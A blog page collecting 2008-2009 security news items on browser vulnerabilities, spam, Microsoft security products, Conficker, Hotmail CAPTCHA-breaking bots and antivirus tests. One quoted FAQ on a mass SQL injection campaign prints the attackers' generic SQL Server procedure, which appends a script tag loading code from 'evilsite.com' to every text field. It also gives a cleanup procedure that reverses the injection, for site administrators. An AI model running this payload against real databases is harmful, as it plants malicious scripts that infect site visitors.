loosy|goosy|ness - Blog

New study places Firefox at the top of vulnerability list for for the first half of 2009:

Application security vendor Cenzic today released its security trends report for the first half of 2009 application. In it, Cenzic claims that the Mozilla's Firefox browser led the field of Web browsers in terms of total vulnerabilities.

According to Cenzic, Firefox accounted for 44 percent of all browser vulnerabilities reported in the first half of 2009. In contrast, Apple's Safari had 35 percent of all reported browser vulnerability, Microsoft's Internet Explorer was third at 15 percent and Opera had just six percent share.

The 2009 figures stand in contrast to Cenzic's Q3/Q4 2008 report, where IE accounted for 43 percent of all reported Web browser vulnerabilities and Firefox followed closely at 39 percent.

As to why Firefox's numbers were so high, Cenzic has a few ideas.

"It's a combination of different things," Lars Ewe, CTO of Cenzic, told InternetNews.com. "They've gotten more traction as a browser, which is good for them and the more you get used the more exposure you have. As well a fair amount of the vulnerabilities have come by way of plug-ins."

One key area that Ewe said was responsible for a number of reported Firefox vulnerabilities is with how the browser handles plug-ins.

"The plug-in architecture that they have is a selling fact for the browser and one of the reasons why I love using it," Ewe said. "They can't control security aspects of all the plug-ins and the vulnerabilities are a side effect of that."

Mozilla has made numerous efforts this year to bolster its plug-in security. Recently they launched a plug-in checker service to ensure that users are running up-to-date versions. The Firefox 3.0.9 update, which came out in April, specifically addressed several key plug-in vulnerabilities.

Though Firefox had the highest number of vulnerabilities, that doesn't necessarily mean that Firefox users were more vulnerable.

Ewe said that Cenzic looked at all reported vulnerabilities. There is no specific differentiation for zero day bugs in the browser vulnerability count either. All that raises the question of how Cenzic actually came up with their vulnerability counts in the first place.

"The process that we follow is looking at a number of different vulnerability databases and sources that we have and trying to come up with a fair percentage based on the deviations we see between the databases," Ewe said. "You could make the argument, that's its 40 percent or 42 percent and there might be some variation on how you analyze it, but certainly it's not off by 20 percent."

While the Cenzic report shows Firefox at the top of the browser vulnerability pile, Ewe was quick to note that Cenzic uses Mozilla technology within its own solutions.

"Full disclosure here, Mozilla plays an important role in Cenzic's solution," Ewe said. "We are actually sitting on top of Mozilla as our agent of preference for scanning sites."

Cenzic develops an application scanning solution that uses the underlying Mozilla browser technology to test out security on Web site insides of a real browser context.

"We have a technology that we refer to as stateful assessment technology," Ewe said. "The idea behind it is to have as faithful an interaction with a Web site as possible and to determine vulnerabilities not on simple signatures but on behavioral basis of the application."

Ewe explained that when you do a cross-site scripting attack with a signature-based approach you'd just look for a server response that would indicate that the script tag has been injected. He added that the problem with that approach is that it's not faithful and the security researcher doesn't know if there is any additional logic on the client side that takes care of the script tag.

"If you want to be really faithful in the process you need to have full rendering capabilities and have all the JavaScript event handling," Ewe said. "So we leverage the entire Firefox architecture in order for us to actually have as faithful an interaction with a server as possible and maintain the client state. That results in low false-positives."

Source: www.internetnews.com

The people who run the world's internet systems are a rather secretive bunch.  Three times a year, senior technical officers from companies such as Google, Yahoo, AT&T, Comcast and Verizon meet to discuss ways of stopping the internet from being swamped by rising levels of spam, viruses and hacking attacks by organised criminals. They do not generally like discussing these meetings.  "Some people might get nervous if they knew all the things we talked about," said Michael O'Rierdan, chairman of the Messaging Anti-Abuse Working Group (MAAWG). "It’s our job to make the internet safe, but we don't want to put people off using the web."  They are also worried about being targeted by the cyber-criminals they are trying to thwart.

Most of the spam and hacking on the internet is run by organised crime rings. There is an underground economy that hacks into computers, sells stolen identities and orchestrates the sending of spam e-mails about everything from fake Viagra pills to banking scams. There is a lot of money at stake in keeping these operations running.  “We get threats every day," said Larry, chief technical officer of Spamhaus, a non-profit organisation that exposes spammers. He prefers not to reveal his surname. "In the US it is people bringing lawsuits against us. And then there are organised criminals in Russia and Ukraine, who use different methods."  Steve Linford, the organisation's founder, has been advised by police not to open unexpected packages arriving at his home.

MAAWG meetings are also places to discuss some of the controversial measures that internet companies need to take in the fight against spam, such as blocking some types of e-mail traffic. This measure sits awkwardly with civil liberties bodies.  The 270 delegates from 19 countries who met at Amsterdam's venerable Hotel Krasnapolsky last week were far from the usual, suit-wearing conference crowd. An eclectic mix of tattoos, ponytails, high-waisted trousers and backpacks indicated that these were true operations people who work in the bowels of the network.  Membership is strictly vetted and journalists are not normally invited to attend, but MAAWG has started to lift its veil a little. There is a growing feeling that the industry must reach out to consumers and get them to help fight cyber-crime.

In 2008, 349.6bn spam messages were sent across the internet, according to Symantec, the internet security company. Spam accounts for an average of almost 94 per cent of all e-mail messages.  Nearly 90 per cent of spam is sent from computers that have been hacked into and are being remotely programmed to send out spam.  More than 9.4m computers have been hijacked in this way and their owners are usually entirely unaware it is going on. It will be impossible to clean up these machines without talking to consumers.

"Sometimes we want people to know what we are doing, so they can yell at the politicians to give us more help," said Jerry Upton, executive director of MAAWG.  There is a rising sense of crisis among internet companies about the cost of spam. Few are willing to quantify how much they have to spend to fight spam, but Mr O'Rierdan estimated that big internet service providers employ five to 10 staff just to look at spam. In addition they must buy spare servers, routers and other equipment to cope with the volumes of junk mail, buy spam-filtering software and run support centers for their customers.

Viriya Upatising, chief technical officer of True Internet, a Thai internet service provider, said junk mail was a crippling cost for the company because it was paying to send the unwanted data across undersea cable connections to destinations such as the US and Europe.  "The cost of bandwidth is expensive in Asia," Mr Upatising said. "It costs us $250 per megabit per month to send data internationally."  The company put in place a draconian system that prevents suspected spammers from using its network. The measures have cut unwanted messages from 3.5m a day to a more manageable 250,000.

"We are all sharing these costs," said Patrick Peterson, chief technology officer at Ironport Systems, Cisco's e-mail security arm. "Spam is a stealth tax on consumers. ISPs have to pay for the spam, for the extra bandwidth, for equipment, and they are forced to put up their prices for consumers."

There is a fear among internet security professionals that they might be losing the battle to cyber-criminals. This may also be why they now want the public to know more about what they do, to show they have at least tried.  "I don't know if we can control it," said Dave Crocker, one of the early pioneers of e-mail and now a senior technical adviser to MAAWG.  He added: "It is an arms race. We are getting better at filtering out rogue messages but every day the criminals get better too, and they are better organized and more aggressive."

Keywords: the dark side of the web

* Spam: Unsolicited electronic messages, most commonly e-mail, but also increasingly common in instant messaging, blogs and mobile phone messages. The first e-mail spam is believed to have been sent in 1978.

* Malware: Malicious software designed to infiltrate or damage a computer system without the owners' consent. Symantec, the internet security company, has estimated there is now more malware released each year than legitimate software programs. There are many different types of malware, including viruses, worms and Trojan horses.

* Phishing : The fraudulent attempt to acquire sensitive information such as passwords, bank account details and credit card numbers. Typically it is in the form of an e-mail that directs people to a fake website - that looks like the legitimate site of a bank or other trusted organisation - where people are asked to enter personal details.

* Botnets: A network of computers that have been hacked and are being remotely controlled by cyber-criminals. Typically they are used to send out spam messages or viruses in large numbers. Most users will be unaware if their computer has been infiltrated and added to a botnet. Symantec estimated there were more than 9.4m machines hijacked in this way in 2008.

Source: http://www.ft.com

BOSTON, June 10 (Reuters) Microsoft Corp (MSFT.O) is getting ready to unveil a long-anticipated free anti-virus service for personal computers that will compete with products sold by Symantec Corp (SYMC.O) and McAfee Inc (MFE.N).

A Microsoft spokesman said on Wednesday that the world's biggest software maker is testing an early version of the product with its own employees. Microsoft would "soon" make a trial version, or product beta, available via its website, he added, but declined to provide a specific date.

Symantec shares fell 0.5 percent on Nasdaq and McAfee fell 1.3 percent on the New York Stock Exchange, while Microsoft was up 2.1 percent. The Nasdaq composite index .IXIC was down 0.47 percent.

Investors are closely monitoring the free service, code-named Morro after Brazil's Morro de Sao Paolo beach, amid concern it could hurt sales of products from Symantec and McAfee, which generate billions of dollars of revenue a year protecting Windows PCs from attacks by hackers.

"It's a long-term competitive threat," said Daniel Ives, an analyst with FBR Capital Markets, though he added that the near-term impact was minimal.

Microsoft has said that Morro will offer basic features for fighting a wide range of viruses, which would likely make it comparable to low-end consumer products from Symantec and McAfee that cost about $40 per year.

Their top-selling products are security suites that come with features including encryption, firewalls, password protection, parental controls and data backup.

Three years ago, Microsoft entered that market with Live OneCare, which turned out to be a commercial flop. It announced plans in November to kill that product suite, saying it would launch the free Morro service by the end of 2009.

Analysts said they are looking forward to Morro's beta to see exactly how its features compare to those in products from competitors.

Microsoft has said it will provide protection from several types of malicious software including viruses, spyware, rootkits and trojans.

Officials with Symantec and McAfee have said they do not see Morro as a threat. 

"Microsoft's free product is basically a stripped down version of the OneCare product Microsoft pulled from the shelves," said Symantec Consumer division president Janice Chaffin. "A full Internet security suite is what consumers require today to stay fully protected."

Joris Evers, a spokesman for No. 2 security software maker McAfee, said his company is already enjoying strong growth despite competition from free anti-virus products that are on the market.

"On a level playing field, we are confident in our ability to compete with anyone who might enter the marketplace," he said.

A spokeswoman for Trend Micro Inc (4704.T), the No. 3 player, declined to comment. (Reporting by Jim Finkle; Editing by Steve Orlofsky, Brian Moss, Richard Chang)

Source: http://www.reuters.com

Microsoft will begin offering its first hosted security service under the Forefront brand on Thursday, dubbed Forefront Online Security for Exchange and designed to help keep malware and spam out of e-mail in-boxes.

The hosted service, which will cost $20 per user per year or less based on volume licensing, targets enterprise Exchange customers and includes a Web-based console for setting up policies for virus and spam protection, said Doug Leland, general manager of Microsoft's Identity and Security Business Group.

The releases will follow the timeline of Exchange 2010, which entered public beta this week. More hosted security services will be coming but Leland declined to elaborate.

Microsoft also will finally release on Thursday a new, public beta version of its Stirling security suite, which is the next generation of the Forefront software.

The initial beta version of Stirling was released a year ago and was supposed to be refreshed by the end of 2008. It will include client, server, and application security technology and offer a single management console.

Stirling components will come in staggered releases starting later this year with Forefront Security for Exchange and Threat Management and continuing through the first half of 2010, Leland said. The company also is changing the name of its Identity Lifecycle Manager product to Forefront Identity Manager and plans to offer a new set of technologies, code-named Geneva, for helping corporations improve the security of software and services, Microsoft said.

In addition, Microsoft said it is investing $75 million in a partner ecosystem, including making a strategic partnership with RSA. Other companies integrating with Stirling include Kaspersky, Brocade, Juniper Networks, Guardium, Imperva, Sourcefire, StillSecure, Q1 Labs, and Tipping Point.

The moves are part of the company's strategy to provide "Business Ready Security."

The moves are part of Microsoft's effort to broaden the scope of its security offerings to incorporate data protection, access and management, all built around the concept of identity, Leland said.

Microsoft wants to offer the ability for corporations to set "fine-grained security policies and have a deeper understanding about who in the organization is triyng to access data and what they are trying to do with it," he said.

Source: http://news.cnet.com

[Update]: Forefront Online Security for Exchange is not only limited to Exchange Server, it can be used by all other mail server.

More than 97% of all e-mails sent over the net are unwanted, according to a Microsoft security report.

The e-mails are dominated by spam adverts for drugs, and general product pitches and often have malicious attachments.

The report found that the global ratio of infected machines was 8.6 for every 1,000 uninfected machines.

It also found that Office document attachments and PDF files were increasingly being targeted by hackers.

Microsoft said people should not panic about the high levels of unwanted e-mail.

Cliff Evans, head of security and privacy for Microsoft in the UK, told BBC News: "The good news is that the majority of that never hits your inbox although some will get through."

Ed Gibson, chief cyber security advisor at Microsoft, said the rise in spam was due to traditional organised crime figures moving away from exploiting software vulnerabilities and "targeting the weak link that is you and me".

"With higher capacity broadband and better OS (operating systems), and higher power computers it is easier now to send out billions of spams. Three or four years ago the capacity wasn't there."

Malware ecosystem

Paul Woods, senior analyst at e-mail security firm Message Labs, said he was surprised the Microsoft figure for unwanted e-mail was so high.

"Our own analysis shows that around 81% of e-mail traffic we were processing was identified as spam and unwanted," he said.

MessageLabs said spam rates had fallen at the end of 2008 as an ISP which had been hijacked to send out spam mails to users had been taken offline.

"As a result of that, a number of developers in botnet technology at the end of last year were trying to regain botnet control and increase capacity and return to previous spam levels.

"It wont be far off before we see return to those levels."

The report, which looked at online activity during the second half of 2008, also pinpoints the countries that are suffering from the most infections of malicious software, or malware.

Russia and Brazil top the global chart of infections, followed by Turkey and Serbia and Montenegro.

It said that the type of malware varied from country to country.

"As the malware ecosystem becomes more reliant on social engineering, threats worldwide have become more dependent on language and cultural factors," it reported.

In China, several malicious web browser modifiers are common, while in Brazil, malware that targets users of online banks is more widespread.

In Korea, viruses such as Win32/Virut and Win32/Parite are common.

 

Global average

The global average for infected machines is 8.6 for every 1,000 uninfected PCs.

The UK's infection rate is 5.7, according to the Microsoft report.

The report highlighted the need to keep operating systems, web browsers and applications up to date with the latest versions.

Increasingly, hackers are using common file formats, such as Microsoft Office documents and Adobe's PDF format as the carrier of malicious exploits or programs.

More than 91% of attacks exploiting vulnerabilities in Microsoft Office were using security holes that had been plugged by updates that had been available for more than two years.

Attacks using PDF files rose sharply in the second half of 2008, the report noted.

The vulnerabilities all of the attacks exploited had already been fixed by Adobe, and were not present in the most recent versions of the software.

Mr Gibson told BBC News people had to be aware that if they did not update their applications, such as Office and Adobe, they were not just putting themselves at risk, but others on the internet also.

"If you don't update your software you are not just a hazard to yourself, you are hazard to others because you can be part of a botnet [if your computer is hijacked]."

Mr Evans said Microsoft was very happy with the approach consumers were taking to updating applications via automatic updates.

"For consumers it is happening but for business less so. We have encourage businesses to make more use of automatic updates."

 

Scareware

Mr Woods said malicious hackers were exploiting Office document attachments and PDF files in order to make more targeted attacks.

"They tend to be used in selective attacks to named individuals in organisations.

"A lot of social engineering will be used to appear legitimate and convince a user to open the attachment

"Once opened, a vulnerability in the application used to open the document will be exploited and often a tiny piece of code will execute and then download a larger file from a rogue website.

"This program will then attempt to search the computer for a particular document or file and sent it to a remote PC."

The report also highlighted the rise in the use of so-called scareware, fake security programs which falsely tell people they need to install software which does nothing other than attempt to steal personal details from a users' PC.

"It's criminals playing on people's fears," said Mr Evans.

"The advice remains the same - ensuring you have up to date software, whether that's your applications, your browser or your OS."

 

Source: http://news.bbc.co.uk

Remember the dire predictions surrounding the "millennium bug?" The doom-and-gloom scenarios bandied about by security analysts on how computers could act when their clocks turned to January 1, 2000?

Well, researchers are hoping that a potential April Fools' time bomb -- the Conficker.c that is supposed to hit computers on April 1 -- turns out to be equally unfounded.

But realizing that hope alone is not a prudent option, here is a primer on the worm so you can adequately prepare yourself -- and your computer.

Computer users will not know that Conficker.c has infected their machine.

What is Conficker.c and what do analysts fear it may do?

Conficker.c is a worm, a malicious program thought to have already infected between 5 million and 10 million computers.

Those infections haven't spawned many symptoms, but on April 1 a master computer is scheduled to gain control of these zombie machines, said Don DeBolt, director of threat research for CA, a New York-based IT and software company.

What happens on April Fools' Day is anyone's guess.

The program could delete all of the files on a person's computer, use zombie PCs -- those controlled by a master -- to overwhelm and shut down Web sites or monitor a person's keyboard strokes to collect private information like passwords or bank account information, experts said.

More likely, though, said DeBolt, the virus may try to get computer users to buy fake software or spend money on other phony products.

Experts said computer hackers largely have moved away from showboating and causing random trouble. They now usually try to make money off their viral programs

How does the Conficker.c work?

Conficker.c imbeds itself deep in the computer where it is difficult to track. The program, for instance, stops Windows from conducting automatic updates that could prevent it from causing damage.

The program's code is also written to evolve over time and its author appears to be making updates to thwart attempts to neuter the worm.

Who wrote the program?

It's unclear who wrote the program, but anti-work researchers -- a group calling itself the Conficker Cabal -- are looking for clues.

First, they know that some recent programs have come from Eastern European countries outside the jurisdiction of the European Union, said Patrick Morganelli, senior vice president of technology for Enigma Software.

Worm program authors often hide in those countries to stay out of sight from law enforcement, he said.

In a way, the Conficker Cabal is also looking for the program author's fingerprints. DeBolt said security researchers are looking through old programs to see if their programming styles are similar to that of Conficker C.

The prospects for catching the program's author are not good, Morganelli said. "Unless they open their mouth, they'll never be found," he said.

So, the most effective counter-assault simply may be damage control.

How can I tell if my computer's infected?

One quick way to see if your computer has been infected is to see if you have gotten automatic updates from Windows in March. If so, your computer likely is fine, DeBolt said.

Microsoft released a statement saying the company "is actively working with the industry to mitigate the spread of the worm."

Users who haven't gotten the latest Windows updates should go to http://safety.live.com if they fear they're infected, the company's statement says.

People who use other antivirus software should check to make sure they've received the latest updates, which also could have been disabled by Conficker.c.

How did the worm evolve?

The first version of Conficker -- strain A -- was released in late 2008. That version used 250 Web addresses -- generated daily by the system -- as the means of communication between the master computer and its zombies.

The end goal of the first line was to sell computer users fake antivirus software, said Morganelli.

Computer security experts largely patched that problem by working with the Internet Corporation for Assigned Names and Numbers to disable or buy the problematic URLs, he said.

A second variant, Conficker.b, was released in January and infected millions more machines.

The Conficker, strain C, will generate 50,000 URLs per day instead of just 250 when it becomes active, DeBolt said.

What is being done to fight Conficker?

Members are searching for the malicious software program's author and for ways to do damage control if he or she can't be stopped.

They're motivated in part by a $250,000 bounty from Microsoft.

Source: http://www.cnn.com

[QUOTE]
Reports about the massive infection of web sites by an automated tool, whose most recent prominent victims have been United Nations, UK Government and the U.S. Department of Homeland Security raised some recurring questions which are worth answering.

1. The attack is targeting Microsoft IIS web servers. Is there a Microsoft vulnerability?
2. What can I do if I’m the administrator of an infected site?
3. What should I do as an user to protect myself?
4. How can NoScript protect if the compromised sites are in my trusted whitelist?

 

“Exploits of a Mom” by xkcd

1. The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability?

   Yes and no. Web developers (or their employers who did not mandate proper security education) are to blame for each single infection, because the SQL injection exploited to infect the web sites is possible thanks to trivial coding errors.
   That said, the attackers are targeting IIS web servers which run ASP for a reason.
   Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts:
   
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

   This is the “secret sauce” which is allowing the attack to reach its impressive numbers, and it works exclusively against Microsoft database technology — but it’s a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful” DB technology of being used in conjunction with web servers different than IIS are very low.
   So, to recap:

   1. There’s no Microsoft-specific vulnerability involved: SQL injections can happpen (and do happen) on LAMP and other web application stacks as well.
   2. SQL injections, and therefore these infections, are caused by poor coding practices during web site development.
   3. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site. Update: more details in this comment.

   In my previous coverage of similar incidents I also assumed a statistical/demographic reason for targeting IIS, since many ASP developers having a desktop Visual Basic background underwent a pretty traumatic migration to the web in the late 90s, and often didn’t really grow enough security awareness to develop safe internet-facing applications.

2. What should I do if I’m the administrator of an infected site?

   First of all, you should call your web developers (or even better, someone who specializes in web application security) and require a full code review to find and fix the SQL injection bugs.
   In the meanwhile you should either put your database offline or recover clean data from a backup, but until the code review is done be prepared to get compromised again. Deploying a web application firewall may mitigate the emergency, but you must understood it’s a merely temporary work-around — the solution is fixing the code (learn from the United Nations tale).
   If you’ve got no clean database backup, you could try to recover by brutally reversing the SQL attack:
   
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
patindex(''%tpircs<%'', reverse(['+@C+']))+7))
where ['+@C+'] like ''<script%</script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

   This SQL procedure walks through your tables and fields, just like its evil prototype, but rather than appending the malicious JavaScript with
   
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')

   it locates and removes it with
   
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
patindex(''%tpircs<%'', reverse(['+@C+']))+7))
where ['+@C+'] like ''<script%</script>''')

   Notice that I’ve not tested my code above, and I’m just providing it as a courtesy: use it at your own risk, after doing a backup of your data.

3. What should I do as an user to protect myself?

   OK, this one is the easiest :)

4. How can NoScript protect if the compromised sites are in my trusted whitelist?

   Even if the compromised site is in your whitelist, allowed to run JavaScript, the malicious scripts are hosted on external servers controlled by the attackers (e.g. www.nihaorr1.com): therefore NoScript prevents them from being loaded and effectively defeats the attack.

[/QUOTE]

Source: http://hackademix.net/2008/04/26/mass-attack-faq/

[QUOTE]
Websense Security Labs ThreatSeeker™ technology has discovered that spammers in their recent tactics have drawn their attention towards traditional and infamous Hotmail, aka Live Hotmail services after the streamlined Live Mail Anti-CAPTCHA operations. Spammers have managed to create automated bots that are capable of not only signing up and creating random Hotmail accounts, but also use these accounts for spamming purposes from a proper Live Hotmail service. Websense predictions about this sophisticated spammer strategy at the time of Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations, and its outcomes have been factual with this attack.

Websense believes that there are four main advantages to spammers from this approach. First, the Microsoft domain is unlikely to be blacklisted. Second, they are free to sign up. Third, the integration of Hotmail with wide range of Windows Live services. And fourth, it may be hard to keep track of them as there are millions of users worldwide using the service.
Let’s see the entire automated process in two stages.

Stage 1: Signing up and creating accounts successfully.
Part 1: Observe the bot hooking itself on to Internet Explorer browser on victims’ machine.

Part 2: Observe the set of pre-determined account names injected on to victims’ machine which bot attempts to sign-up over victims’ machine.

Part 3: The bot uses Internet Explorer browser in the background on the victims’ machine for attempting Hotmail account sign-up process.

Part 4: Observe the bot visiting Microsoft Hotmail account sign-up page, trying to grab CAPTCHA, and sending it to CAPTCHA breaking host for account creation.

Part 5: Try-break, try-break, try-break.

Part 6: Observe CAPTCHA images being collected as hidden files from victim’s machine during different account sign-up attempts.

Part 7: Unlike, Live Mail CAPTCHA break process, in this attack, the CAPTCHA breaking host communication with the victims’ machine is scrambled. It is observed that 8 characters in the CAPTCHA code are returned instantly during the sign-up, after the CAPTCHA image is sent to the breaking host. The bot infected or victims’ machine descrambles it to signup the account successfully.

Part 8: Observe that account is being signed up and created successfully.

Part 9: The created account credentials are returned back to CAPTCHA breaking host.

The entire process is automated and carried out in iterative manner until all the accounts are successfully signed up in the list injected (initially) on to victims’ machine (refer to Stage 1, Figure 1.2).
Stage 2: Spamming using created accounts from a proper Hotmail Server
Once all the accounts in the list (refer to Stage 1, Figure 1.2) are signed up by the bot, they are then picked randomly and used for spamming purposes.
Part 1: Observe the login process in action.

Part 2: Login process in further progress.

Part 3: Proper login in progress over SSL page.

Part 4: Observe the bot attempted a successful login on to a proper Live Hotmail Server page.

Part 5: Observe the bot attempting to initiate the edit process or composing a message for spamming.

Part 6: Spam message build in progress by the bot.

Part 7: Bot successfully filling in the "from email address list", “to email address“ lists , email subject, and the body to be included in the message for spamming purposes, there by competing its task.

End of message! Spam is being sent to targeted accounts.
Part 8: Finally the account is logged out to continue it similar operation with next email account.

Part 9:The entire process in action that is carried out in iterative manner to perform mass-mailing from different accounts created by the bot.

Spammers finally have success advertising their product.

Observations:
Stage 1: One in every 8 to 10 attempts to signup a hotmail account are successful. Hence success rate approximately ranges between 10 to 15%.
Stage 2: Spam campagins from one Hotmail account is sent to multiple accounts in CC and BCC list at a time. The same Hotmail account (or “from account/ address”) is not repeatedly used for sending spam campaigns continuously. They are changed in timely fashion by the bot. The same is the case with targeted accounts (or “to account(s)/ addresses) for spamming.
Additional Information:
It is observed that unlike Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations in the past, the current attack is aggressive and instantaneous in terms of CAPTCHA breaking host turn-around time.
In the current attack, the response time of CAPTCHA breaking host after grabbing a CAPTCHA image from a victims’ machine, analyzing it, and responding back to victims’ machine with corresponding CAPTCHA code is relatively lower when compared to previous attacks.
Note 1: It is observed that the total response time for CAPTCHA breaking on the average is only about 6 seconds*.

Note 2: The timing on the request/response in this current attack clearly indicates the possibility of an automated system at the spammers’ end performing the Anti-CAPTCHA operation.
Websense believes that these accounts could be used by the spammers at any time for a variety of social-engineering attacks in future. A wide range of attacks (both manual and automated) would be possible using the same account credentials on other significant Live services integrated with Live Hotmail services offered by Microsoft Corporation, such as Live Messenger (instant messaging), Live Spaces (online storage), etc.

Note: For more information on Hotmail aka Live Hotmail and Live services, see the Hotmail, Live Hotmail and Live Mail entries on Wikipedia.
[/QUOTE]

Source: http://securitylabs.websense.com/

[QUOTE]
Researchers at Virus Bulletin have released the results of the latest VB100 computer security test, highlighting failures at a number of leading security vendors.

Products from Sophos, Trend Micro and Kaspersky were among those that failed to protect fully against a collection of outdated viruses.

The December edition of the VB100 test subjected security software to 100 Windows 2000 viruses collected from labs and websites.

"It was a shock and a concern to see such a poor performance from so many products in this latest round of testing," said John Hawes, a technical consultant at Virus Bulletin.

"It is particularly disappointing to see so many major products missing significant real-world threats."

In order to pass the test, vendors needed to identify 100 malware samples as well as avoid reporting false positives on clean samples.

Kaspersky failed the test by missing one virus from the list, while Sophos missed eight. Trend Micro missed four virus samples, failing VB100 certification for the fourth time in five tests.

Trend Micro products had passed 13 consecutive VB100 tests. The company declined to comment on the results.

Other notable security products failing the VB100 test included PC Tools' Spyware Doctor, which recorded two false positives, and Norman Virus Control, which missed 14 samples and recorded six false positives.

Companies whose products passed the test included BitDefender, Symantec, McAfee, Sunbelt and Microsoft.
[/QUOTE]

Source: http://www.vnunet.com